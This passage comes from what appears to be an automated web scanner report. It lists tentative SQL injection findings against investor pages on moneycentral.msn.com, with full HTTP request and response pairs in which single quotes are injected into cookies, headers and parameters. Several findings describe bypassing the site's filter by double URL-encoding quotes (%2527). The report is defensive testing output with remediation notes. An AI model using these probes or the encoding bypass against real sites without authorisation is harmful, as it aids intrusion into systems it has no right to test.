   if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr;
</script>
...[SNIP]...

Request 2

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true%00''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:33 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.60. http://redacted/investor/market/usindex.aspx [CC cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/usindex.aspx

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:32 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.61. http://redacted/investor/market/usindex.aspx [MC1 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/usindex.aspx

Issue detail

The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:09 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/usindex.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32%2527%2527; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.62. http://redacted/investor/market/worldmarkets.aspx [CULTURE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:26 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:04:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.63. http://redacted/investor/market/worldmarkets.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:05:30 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:32 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.64. http://redacted/investor/market/worldmarkets.aspx [expid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/market/worldmarkets.aspx

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/market/worldmarkets.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'';

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"><head><meta http-e
...[SNIP]...

1.65. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:20 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

1.66. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:06:22 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d&1%2527%2527=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:06:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.67. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s='&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:161bf"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:13:58 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&s=''&o=&p=0&tab=mkt HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:13:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 65214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.68. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s_cc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true'; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:1a400"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
Date: Sun, 30 Jan 2011 18:05:29 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/partsub/funds/etfperformancetracker.aspx?fam=&cat=&p=0&tab=mkt&s=ytd&o=d HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true''; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.69. http://redacted/investor/portfolio-manager/portfolio.aspx [REST URL parameter 2]

Summary
